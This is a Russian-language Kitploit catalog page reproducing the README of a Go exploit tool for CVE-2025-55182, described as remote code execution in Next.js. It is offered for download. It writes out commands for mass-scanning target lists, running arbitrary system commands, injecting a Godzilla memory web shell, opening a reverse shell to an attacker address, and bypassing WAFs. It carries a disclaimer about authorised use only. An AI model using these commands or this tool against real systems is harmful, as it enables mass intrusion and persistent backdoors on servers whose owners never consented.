Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-POC — Сканер и инструмент эксплуатации на Go для CVE-2025-55182 (RCE в Next.js). Поддерживает массовое сканирование, выполнение команд, внедрение оболочки в память Godzilla, обратную оболочку и обход WAF. | Kitploit
Инструменты/GitHubGitHub/luoqichen/cve-2025-55182-poc
Сканеры уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHub
luoqichen/cve-2025-55182-poc

CVE-2025-55182-POC

Сканер и инструмент эксплуатации на Go для CVE-2025-55182 (RCE в Next.js). Поддерживает массовое сканирование, выполнение команд, внедрение оболочки в память Godzilla, обратную оболочку и обход WAF.

Репозиторий
56 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-55182 Next.js RCE Scanner

License

Инструмент для сканирования и эксплуатации уязвимости CVE-2025-55182 – удалённого выполнения кода в приложениях Next.js. Поддерживает массовое обнаружение, выполнение команд, инъекцию память-шелла Godzilla и обратный шелл.

⚠️ Данный инструмент предназначен исключительно для исследований безопасности и авторизованного тестирования. Не используйте его в незаконных целях.

Особенности

  • Сканирование нескольких целей: поддерживает одиночный URL, список URL в файле (по одному на строку) и папку, содержащую несколько .txt файлов.
  • Многопоточность: настраиваемое количество потоков для повышения эффективности.
  • Проверка уязвимости: верификация через анализ произведения случайных чисел.
  • Выполнение команд: произвольные системные команды на уязвимой цели (поддерживаются Linux и Windows).
  • Инъекция память-шелла Godzilla: однокнопочное создание информации для подключения Godzilla.
  • Обратный шелл: поддержка функции обратного шелла.
  • Сохранение результатов: автоматическое сохранение успешно использованных URL и подробностей в success.json, с возможностью вывода списка уязвимых URL в указанный файл.
  • Поддержка прокси: настраиваемый HTTP-прокси для интеграции с Burp Suite и другими инструментами.
  • Индикатор прогресса: отображение текущего прогресса, затраченного времени, оценочного оставшегося времени и т.д.
  • []

    Установка

    Предварительные требования

    • Go 1.16 или новее
    • Git

    Клонирование репозитория

    root@kitploit:~
    git clone https://github.com/luoqichen/CVE-2025-55182-POC.git
    cd cve-2025-55182-POC
    

    Компиляция

    root@kitploit:~
    go build -o cve-2025-55182 main.go
    

    Запуск

    root@kitploit:~
    ./cve-2025-55182 -h
    

    Использование

    Параметры

    ПараметрТипЗначение по умолч.Описание
    -ustringнетОдиночный целевой URL (например http://example.com:3000)
    -fstringнетФайл со списком URL (по одному на строку)
    -dstringнетПапка с несколькими .txt файлами
    -ostringнетВыходной файл (список уязвимых URL, по одному на строку)
    -tint10Количество потоков
    -toint10Таймаут запроса (сек)
    -cstringнетКоманда для выполнения (например id)
    -mstringнетРежим: waf (включить обход WAF)
    -pstringнетHTTP-прокси (например http://127.0.0.1:8080)
    -gboolfalseВключить инъекцию память-шелла Godzilla
    -rsstringнетАдрес для обратного шелла (формат IP:PORT)
    -dvboolfalseПодробный режим (вывод процесса сканирования для каждого URL)
    -esboolfalseРежим сканирования чувствительной информации

    Примеры

    Сканирование одной цели

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000
    

    Пакетное сканирование целей из файла

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -t 20 -o vuln.txt
    

    Выполнение команды

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -c "whoami"
    

    Использование память-шелла Godzilla

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -g
    

    После успешной инъекции инструмент выведет адрес подключения Godzilla, пароль, ключ и информацию о заголовке запроса.

    Обратный шелл

    root@kitploit:~
    ./cve-2025-55182 -u http://target.com:3000 -rs 10.0.0.1:4444
    

    Включение прокси

    root@kitploit:~
    ./cve-2025-55182 -f targets.txt -p http://127.0.0.1:8080 -t 10
    

    Пояснение к выводу

    • success.json – автоматически сохраняет подробную информацию обо всех успешно эксплуатированных целях (включая вывод команд, конфигурацию Godzilla и т.д.).
    • Файл, указанный через -o – сохраняет список уязвимых URL (по одному на строку).

    Во время сканирования в реальном времени отображается индикатор прогресса и найденные уязвимости. В конце выводятся статистические данные.

    Примечания

    1. Убедитесь, что у вас есть разрешение – сканирование или атака на чужие системы без авторизации является незаконной.
    2. Использование прокси – если необходимо просматривать трафик через Burp Suite, используйте параметр -p для задания прокси.
    3. Подключение Godzilla – после успешной инъекции используйте клиент Godzilla для подключения. Обратите внимание, что пароль и ключ генерируются случайным образом.
    4. Настройка таймаута – для целей с плохим сетевым соединением можно увеличить значение параметра -to.

    Отказ от ответственности

    Данный инструмент предназначен только для исследований безопасности и авторизованного тестирования. Пользователь несёт полную юридическую ответственность. Разработчик не несёт ответственности за любое неправомерное использование.

    License

    MIT

    Скачать инструмент